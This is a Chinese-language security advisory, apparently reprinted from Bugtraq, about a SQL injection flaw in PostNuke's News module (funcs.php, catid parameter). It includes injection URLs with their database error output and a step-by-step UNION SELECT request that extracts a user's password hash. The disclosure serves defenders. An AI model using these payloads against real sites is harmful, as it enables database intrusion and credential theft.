PostNuke funcs.php脚本远程SQL注入漏洞
作者:
文章来源:

发布日期：2005-02-28
更新日期：2005-03-01

受影响系统：

PostNuke PostNuke Phoenix 0.760-RC2

描述：

PostNuke是一个广为流行的网站创建和管理工具，它可以使用很多数据库软件作为后端，比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PostNuke的modules/News/funcs.php脚本中的getArticles()对用户提交的参数缺少充分过滤，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感信息或修改数据库。

当这个函数在激活状态时，可通过在变量catid中增加SQL查询，如：

http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3 \


Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

另外$query变量是：

- ---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", \
pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS \
"cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments", \
pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext", \
pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", \
pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS "themeoverride", \
pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", pn__stories.pn_title \
AS "title", pn__topics.pn_topicname AS "topicname", pn__topics.pn_topicimage AS \
"topicimage", pn__topics.pn_topictext AS "topictext", pn__topics.pn_counter AS \
"tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm AS "withcomm" \
FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid = \
pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = \
pn__topics.pn_topicid WHERE (pn__stories.pn_language  ='eng' OR \
pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY \
                pn__stories.pn_time DESC
- ---------------

此漏洞可被用于获得id=2用户的密码：

Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

pn_是前缀：

Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID \
=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_un \
ame,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null \
,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*


<*来源：Maksymilian Arciemowicz （max@jestsuper.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110962819232255&w=2
*>

建议：

厂商补丁：

PostNuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.postnuke.com/